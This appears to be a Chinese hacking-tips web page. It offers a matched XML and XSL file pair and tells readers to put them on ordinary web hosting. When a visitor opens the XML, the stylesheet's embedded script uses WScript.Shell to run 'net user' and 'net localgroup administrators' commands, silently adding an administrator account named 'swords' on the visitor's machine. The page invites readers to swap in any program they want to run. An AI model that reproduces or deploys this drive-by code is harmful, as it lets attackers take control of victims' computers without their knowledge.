用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。
swords.xml
|
<?xml version="1.0" encoding="GB2312"?> <?xml-stylesheet type="text/xsl" href="swords.xsl"?> <name>I am swords,I am admin!</name> swords.xsl <?xml version="1.0" encoding="gb2312"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"> <xsl:template match="/"> <html> <body> <xsl:value-of select="name" /> <xsl:script> function run() { var wsh; var wsh = new ActiveXObject("WScript.Shell"); wsh.run( "net user swords est /add",0); wsh.run( "net localgroup administrators swords /add",0); wsh.run( "cmd.exe /c echo test!"); } </xsl:script> <xsl:eval>run()</xsl:eval> </body> </html> </xsl:template> </xsl:stylesheet> |
【利用xml+xsl给客户机添加超级管理帐户!】相关文章:
★ 漏洞漫舞的飞骋